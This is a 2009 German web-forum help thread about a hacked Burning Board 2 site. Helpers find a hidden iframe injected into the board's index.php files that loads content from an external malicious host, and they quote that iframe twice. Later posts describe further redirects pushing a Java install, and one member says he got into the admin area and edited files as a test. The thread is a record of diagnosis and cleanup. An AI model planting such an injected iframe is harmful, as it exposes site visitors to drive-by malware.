Haumis wbb hilfe (http://haumis-wbb-hilfe.de/wbb2/index.php)
- WBB2 (http://haumis-wbb-hilfe.de/wbb2/board.php?boardid=3)
-- Es klappt nicht (http://haumis-wbb-hilfe.de/wbb2/board.php?boardid=48)
--- Index und ACP nicht erreichbar (http://haumis-wbb-hilfe.de/wbb2/thread.php?threadid=223)
Geschrieben von World-of-Xtreme am 08.09.2009 um 10:39:
Index und ACP nicht erreichbar
Moin zusammen,
iiiiich hab ein problem wo ich nicht weiß worann es liegt.
Als ich heut früh in mein Board wollte, kam ich auf das Portal, alles wie immer, doch als ich dann aufs Board selber also auf die index seite wollte, war die seite Weiß. Ich hab dann versucht in die ACP zu gelangen übers Portal, diese war auch weiß. Ich weiß echt nicht was da los ist. Wenn ich über das Portal zu den Beiträgen gehe ( News und Top Themen) sind diese erreichbar.
Hat da wer ne ahnung was da nicht stimmen kann?
Zum Portal:
http://world-of-xtreme.com/wbb2/jgs_portal.php
Zum Board:
http://world-of-xtreme.com/wbb2/index.php
zu nem Beitrag:
http://world-of-xtreme.com/wbb2/thread.php?threadid=646&sid=
würd mich über Antwort freuen.
MfG
W-o-X
Geschrieben von Shivaeye am 08.09.2009 um 11:11:
Hallo WOX,
besteht das Problem noch? Ich kann sowohl Portal, als auch Startseite betreten... na den beitrag kann ich nicht lesen, da ich nicht befugt bin, aber mir sieht das alles gut aus....
Geschrieben von haumi am 08.09.2009 um 11:21:
Hi shivaeye,
Ich hab das eben sofort in die Hand genommen.
Beide index-php vom Board und von ACP waren infiziert.
Unter dem php-Code Ende ( ?> ) befand sich folgender iframe:
Bitte nicht aufrufen, wer weiß was dahinter steckt.
| code: |
1:
|
<iframe src="http://onniru.homelinux.org:8080/ts/in.cgi?open5" width=363 height=0 style="visibility: hidden"></iframe> |
|
Zusätzlich waren die Templateaufrufe entfernt worden.
Daher die weißen Seiten.
Ich hab das wieder hergestellt und es schein wieder problemlos zu laufen.
Es ist aber angesagt, das Passwort zum FTP.Zugang zu ändern.
LG
Haumi
Geschrieben von Shivaeye am 08.09.2009 um 11:22:
Wer macht denn sowas... grrr... na wie schön, dass es reperabel war und wieder geht. Hami ist ein Engel
Geschrieben von World-of-Xtreme am 08.09.2009 um 11:53:
Hab ne Email an allinkl geschickt und warte da jetzt auf antwort.
Das FTP PW habe ich nun auch abgeändert.
Ich frage mich wie so was passieren kann?
Der Haumi ist kein Engel, er ist ein kleiner Gott *schrein erstell und anbet*
Geschrieben von samurai am 08.09.2009 um 12:17:
| Zitat: |
Original von haumi
Hi shivaeye,
Ich hab das eben sofort in die Hand genommen.
Beide index-php vom Board und von ACP waren infiziert.
Unter dem php-Code Ende ( ?> ) befand sich folgender iframe:
Bitte nicht aufrufen, wer weiß was dahinter steckt.
| code: |
1:
|
<iframe src="http://onniru.homelinux.org:8080/ts/in.cgi?open5" width=363 height=0 style="visibility: hidden"></iframe> |
|
Zusätzlich waren die Templateaufrufe entfernt worden.
Daher die weißen Seiten.
Ich hab das wieder hergestellt und es schein wieder problemlos zu laufen.
Es ist aber angesagt, das Passwort zum FTP.Zugang zu ändern.
LG
Haumi |
|
zuSpät
wollte ma schauen was da drin ist
leider nichts zum essen
aber ein Trojaner und ein Virus waren drinne xD
@World-of-Xtreme
bitte schau mal in deine Footer.tpl ;) vom WOW style der ist bissel der rupft
:D unten ;) da fehlt einiges
Geschrieben von World-of-Xtreme am 08.09.2009 um 12:24:
O.o was ist denn ein Footer?
Haumi hats hingebogen. Allerdings der Dumper funzt nicht, da kommt das hier:
| Zitat: |
| Parse error: syntax error, unexpected '<' in /www/htdocs/w0093d4f/wbb2/acp/mysqldumper/index.php on line 32 |
|
O.o???
Haumi guckst du bitte noch mal wenn du gegessen hast?, Dann zieh ich gleich wieder n neues Backup. >.< Hätt ich s doch gestern nicht vergessen.
Geschrieben von samurai am 08.09.2009 um 12:31:
| Zitat: |
Original von World-of-Xtreme
O.o was ist denn ein Footer?
Haumi hats hingebogen. Allerdings der Dumper funzt nicht, da kommt das hier:
| Zitat: |
| Parse error: syntax error, unexpected '<' in /www/htdocs/w0093d4f/wbb2/acp/mysqldumper/index.php on line 32 |
|
O.o???
Haumi guckst du bitte noch mal wenn du gegessen hast?, Dann zieh ich gleich wieder n neues Backup. >.< Hätt ich s doch gestern nicht vergessen. |
|
Den dumper kannst du leicht neu installieren ;)
:D brauchst dir einfach die neuste version runter laden
zu dem Footer
ACP -> Templates bearbeiten -->ds-WOW (kann auch bei dir anders heißen) --> Footer --> ;) und da mal nach schauenda deine ganzen einbauten unten den Style aus ein andere reisen
Footer zu deutsch heißt Fußzeile
;) also unten
Geschrieben von haumi am 08.09.2009 um 14:29:
Da der dumper auch eine index hat liegt es auf der Hand, das auch diese verseucht ist.
Ich greife den Vorschlag von Samurai auf und baue den neuen dumper ein und sag denn Bescheid.
Den Footer schau ich mir dabei auch gleich mal an.
LG
haumi
Geschrieben von haumi am 08.09.2009 um 16:21:
Dumper installiert und backup gemacht.
Das mit dem Footer sind die Votebuttons die du meinst - denke ich mal.
Die werde ich denn mal in einer ruhigen Minute gerade setzen.
LG
haumi
Geschrieben von Speddy20537 am 09.09.2009 um 00:55:
| Zitat: |
Original von World-of-Xtreme
O.o was ist denn ein Footer?
Haumi hats hingebogen. Allerdings der Dumper funzt nicht, da kommt das hier:
| Zitat: |
| Parse error: syntax error, unexpected '<' in /www/htdocs/w0093d4f/wbb2/acp/mysqldumper/index.php on line 32 |
|
O.o???
Haumi guckst du bitte noch mal wenn du gegessen hast?, Dann zieh ich gleich wieder n neues Backup. >.< Hätt ich s doch gestern nicht vergessen. |
|
leute ein guten tip noch an euch gibt euer verzeichnis nicht so offentlich bekant denn weis jeder wo euer verzeichnis liegt und es ist denn immer sehr leichter euch anzu greigen also das hier /www/htdocs/w0093d4f/ weg lassen uund gutt nur eine kleiner tip von mir.
desweiteren frage ich mich gerade habt ihr eine htacces für denn acp angelegt und wenn ja wie sind die passwörter????
Geschrieben von samurai am 09.09.2009 um 14:10:
um die Frage von Speedy zu beantworten ich komme ganz einfach ins ACP ;)
Geschrieben von haumi am 09.09.2009 um 16:08:
Da frage ich mich wie?
Ich bekomme folgendes wenn ich versuche ins ACP zu kommen.
http://world-of-xtreme.com verlangt einen Benutzernamen und ein Passwort. Ausgabe der Website: "Folterkammer"
LG
haumi
Geschrieben von nobody am 09.09.2009 um 19:24:
Die Seite hat erneut eine besucher.
Bei mir wird angezeigt das ein schlimmer geist vorhanden ist.
nobody
Geschrieben von haumi am 09.09.2009 um 19:37:
Dann schau ich mich nochmal um.
Danke für den Hinweis.
LG
haumi
Geschrieben von nobody am 09.09.2009 um 19:56:
Es ist dort scheinbat eine weiterleitung vorhanden.
die seite will ein java installieren.
in diesem java und der "falschen Seite" ist der bösewicht eingebaut.
Vorschlag:
Seite TOTAL löschen
Seite danach TOTAL neu aufbauen mit einem anderen Link
z.B.: ***:// xyz/xyz/wbb2/......
Da ja derjenige der das dort eingebaut hat zugang zur seite besitzt schlage ich weiter vor das der Hoster gewechselt wird.
nobody
Geschrieben von haumi am 09.09.2009 um 20:21:
Ich hab noch zwei weitere gefunden,
in der weiterleitung und noch wo.
Schau mal obs jetzt sauber ist.
Der Hoster ist all-inkl - von daher sollte es eigendlich in Ordnung sein.
Die Dintge die ich jetzt noch gefunden habe können noch vom erstn Angriff sein.
Danach ist ja das Passwort geändert worden.
Lt. All-inkl kann es durch jemand unbewußt übertragen werden der Zugang zum FTP hat.
Das könnte der Inhaber selbst sein.
LG
Haumi
Geschrieben von nobody am 09.09.2009 um 20:27:
nun ist scheinbar der besucher entfernt worden.
unbewusst kann man keine dateien abändern das geht nicht.
handlungen dieser art sind immer per tastatur und per finger gemacht.
es ist mit sicherheit noch nicht vorbei.
nobody
Geschrieben von Shivaeye am 09.09.2009 um 21:03:
Mensch, was ist denn da los? Wer oder was macht denn sowas?
Geschrieben von samurai am 10.09.2009 um 12:33:
*böse ist*
also ich war mal heute nact böse hab mal versucht ein paar änderungen im bereich root/acp machen zu wollen ;)
ich komme zwar nicht so leicht rein aber wenn ich drin bin kann ich änderungen dort machen
hab gestern bissel in der group.php rum gekritzelt gespeichert und dan wieder mit einer sicherung ersetzt ;) wennich so was probiere mach ich eine sicherung
daher sollte ich mal sagen setze deine chmod rechte nicht auf 777 sondern eher 644 oder 666
Forensoftware: Burning Board 2.3.6, entwickelt von WoltLab GmbH